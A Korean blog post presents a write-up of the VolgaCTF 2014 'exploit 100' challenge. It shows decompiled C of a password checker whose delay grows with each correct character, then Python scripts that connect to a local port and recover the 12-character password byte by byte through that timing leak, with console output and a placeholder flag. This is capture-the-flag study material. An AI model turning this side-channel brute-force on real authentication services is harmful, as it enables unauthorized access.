티스토리 뷰
이것 저것 해보다 보니 풀린 문제
*password와 flag는 임의로 작성하였습니다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | while ( 1 ) { do { read(fd, &v14, 15u); LOBYTE(v17) = 0; } while ( strlen(&v14) != 12 ); v7 = 0; for ( i = 0; i <= 11; ++i ) { if ( password[i] == *(&v14 + i) ) ++v7; } if ( v7 == 12 ) break; randValue = rand() % 1000; for ( j = 0; j < v7; ++j ) { for ( k = 1; k <= 0xDEADBEEE; ++k ) randValue = k ^ (k + randValue); } sprintf(&s, "%x\n", randValue); write(fd, &s, strlen(&s)); } write(fd, flag, strlen(flag)); | cs |
password.txt에 있는 password를 얻어 넣어주면 Flag가 뜸.
사실 직접 random한 값을 복호화 해서 어찌저찌 하는 문제인줄 알았지만 그런류의 문제는
아니였던거 같음.
해보면서 알앗는데 12바이트의 문자열을 넣었을때 특정한 값이 들어가면 문자열을 반환하지 않고
그대로 멈춰버림 아마 password의 바이트를 만나면 그런거 같음.
(12바이트가 모두 같으면 플래그를 출력 하겠지만)
그래서 한바이트 한바이트 값을 넣어서 멈추는 곳이 그 바이트의 패스워드라고 생각을 했음
그래서 프로그램을 두개 만들어 멈추는 곳에서 Ctr + C를 누르고 다음으로 넘어가는 식으로
하나하나 Password를 구하여 Flag를 얻음.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 | from socket import * import sys def setSock(ip, port): s = socket(AF_INET, SOCK_STREAM) s.connect((ip, port)) return s def exploit(n, s): print s.recv(1024) n = int(n) Unprintable = chr(128) for i in range(ord('!'), 0x80): password = Unprintable*(12 - (12-n)) password += chr(i) password += Unprintable * ((12 - n)) print chr(i) s.send(password + "\n") s.recv(128) if __name__ == "__main__": sock = setSock("localhost", 7026) exploit(sys.argv[1], sock) | cs |
Password의 앞, 뒤값들을 128(0x80)으로 한건 문제에서 password가 printable하다고
했기 때문임. 128은 ASCII값에서 벋어나기 때문에 Unprintable하다고 추측함
(실제 대회에서는 password가 뭐였는지 모름)
1 2 3 4 5 | import os for i in range(12): command = "python exploit.py " + str(i) os.system(command) | cs |
brute.py(아래 code)를 실행시켜 주면 아래와 같이 나옴
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 | root@Kali ~/s/e/v/100# python brute.py The password consists of 12 printable characters ....(omitted) A B C ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) ` a ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) l m n ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) W X Y ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) m n o ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) s t u ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) Q R S ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) c d e ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) c d e ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) K L M ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) c d e ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt The password consists of 12 printable characters ....(omitted) = > ? ^CTraceback (most recent call last): File "exploit.py", line 28, in <module> exploit(sys.argv[1], sock) File "exploit.py", line 24, in exploit s.recv(128) KeyboardInterrupt | cs |
나온 값들을 종합해 보면 아래와 같은 Password가 나옴
1 | CanYouSeeMe? | cs |
1 2 3 | The password consists of 12 printable characters CanYouSeeMe? flag is {VolgaCTF 2014 Quals Vuln100} | cs |
*password와 flag는 임의로 작성
+ 다른 writeup들을 봤더니 맞으면 뭔가 띄우긴 하는거 같은데.. 뭐지.. 왜 나는 멈추지..
'Pwnable > CTF' 카테고리의 다른 글
| Volga CTF 2014 [exploit 400] (0) | 2015.01.30 |
|---|---|
| Volga CTF 2014 [exploit 300] (0) | 2015.01.29 |
| CSAW 2012 [Challenge1] (0) | 2015.01.23 |
| CodeGate 2014 [ Angry Doreamon ] (2) | 2015.01.14 |
| NullCon 2014 [Exploitation 100] (0) | 2015.01.13 |
댓글